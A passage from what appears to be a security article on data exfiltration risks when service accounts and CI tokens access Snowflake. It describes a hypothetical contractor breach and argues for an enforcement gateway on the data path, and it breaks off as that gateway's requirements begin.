Imagine a CI pipeline that runs nightly analytics jobs against your Snowflake warehouse. The pipeline uses a service account whose credentials are baked into a Docker image and shared across dozens of repositories, creating a data exfiltration risk. When the job finishes, an internal S3 bucket that is publicly readable within the corporate network receives the artifact containing raw query results. A few weeks later, an off‑boarded contractor who still has a copy of the service account token discovers the bucket and downloads the data. Your security team traces the breach back to the service account, but no alert fires because the connection to Snowflake streams data directly without any audit. This unchecked flow is a classic data exfiltration scenario.
This scenario illustrates a common reality: non‑human identities, service accounts, CI tokens, automation keys, are often granted sweeping privileges, stored in places that are easy to copy, and used without any visibility into what they actually do. When those identities are compromised, the attacker inherits exactly the same level of access, making data exfiltration a low‑effort, high‑impact attack.
Why data exfiltration is a risk with non‑human identities
Snowflake is designed for massive data analytics, which means it holds large, valuable datasets. Non‑human identities typically have long‑lived credentials that are not tied to a single human user. Because they are meant for automation, they often receive read‑only or read‑write roles on many schemas, tables, and views. The lack of a human in the loop means there is no real‑time review of the queries being executed.
Two concrete weaknesses emerge:
- Unrestricted data flow. An automation job can export entire tables to external storage with a single COPY INTO command. If the job is compromised, that command can be repurposed to ship data to an attacker‑controlled endpoint.
- Invisible activity. Traditional audit logs in Snowflake capture who ran a query, but they do not enforce policy at the moment of execution. If a malicious script runs under the service account, the logs only show that the service account ran the query, nothing flags the abnormal data volume or destination.
Both issues stem from the fact that the enforcement point is missing. The identity system decides who may start a session, but once the session is established, Snowflake itself does not block or record the data that leaves the system in real time.
What a proper enforcement layer looks like
The missing piece is a gateway that sits on the data path between the non‑human identity and Snowflake. The gateway must be able to:
